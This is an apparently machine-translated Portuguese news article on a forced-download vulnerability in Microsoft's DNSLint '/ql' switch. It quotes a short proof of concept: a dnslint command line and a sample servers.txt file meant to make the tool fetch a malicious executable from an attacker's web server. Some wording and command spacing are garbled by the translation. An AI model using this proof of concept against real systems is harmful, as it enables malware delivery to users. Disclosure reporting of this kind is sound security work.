O switch QL do utilitário DNSLint da Microsoft pode permitir o download de arquivos remotos

Segurança / O switch QL do utilitário DNSLint da Microsoft pode permitir o download de arquivos remotos 2 minutos lidos

Corporação Microsoft



A Microsoft DNSLint O utilitário funciona para diagnosticar problemas de pesquisa de nome do Sistema de Nomes de Domínio (DNS) relacionados aos endereços IP atribuídos a diferentes servidores da Web acessados ​​por meio de um navegador. Ele não está incluído como parte do pacote básico do Windows, mas pode ser baixado do site da Microsoft gratuitamente. Uma vulnerabilidade de acesso remoto avaliada em 7,6 (crítica) no CVSS 3.0 escala foi descoberta para afetar este utilitário, causando a ocorrência de um drive forçado por downloads.

A vulnerabilidade surge do fato de que DNSLint não revisa nomes de domínio ao analisar arquivos de teste DNS de acordo com a opção “/ ql”. No caso de um usuário final conseguir usar um arquivo que contém script ou código binário em oposição às informações de nome de domínio normalmente antecipadas, o sistema pode ser colocado em risco onde se torna mais fácil instituir downloads forçados. Caso isso ocorra, um hacker pode solicitar o download forçado de um arquivo malicioso que pode baixar e executar comandos remotos quando acessado pelo navegador da web. O download seria salvo em um local do sistema local e solicitaria acesso de segurança e, vendo que o arquivo vem de um local conhecido na unidade de disco, o usuário pode se inclinar a permitir que o executável seja transportado. Depois que o arquivo malicioso recebe o privilégio, ele pode executar qualquer código pretendido remotamente e comprometer a segurança e a privacidade do usuário.



John Página de hyp3rlinx escreveu uma prova de conceito que simula esta vulnerabilidade, explicando que um arquivo indesejado pode ser baixado conforme o seguinte quando um script ou arquivo de texto de referência binária é usado em vez do nome de domínio:



dnslint.exe / v / y / d “MALWARE-FILE” / s X.X.X.X / r “myreport”



No contexto do utilitário DNSLint, o seguinte mostra como a vulnerabilidade pode ser explorada para introduzir malware no sistema.

1) “dnslint-update.exe” no diretório raiz do servidor web remoto.
2) “servidores.txt”
DNSLint
; Este é um exemplo de arquivo de entrada DNSLint
+ Este servidor DNS é denominado: dns1.cp.msft.net
[dns ~ servidor] X.X.X.X
, a, r; registro A
X.X.X.X, ptr, r; registro PTR
test1, cname, r; registro CNAME
test2, mx, r; registro MX
3) dnslint.exe / ql servers.txt

O código acima não foi modificado conforme descrito pelo direitos de hyp3rlinx para este conteúdo. Divulgando esta vulnerabilidade, não parece que haja nenhuma atualização de patch para resolver esse problema ainda. Um código CVE ainda deve ser atribuído a esta vulnerabilidade e deve ser identificado e escrito pela Microsoft em seu boletim oficial de segurança sobre o assunto.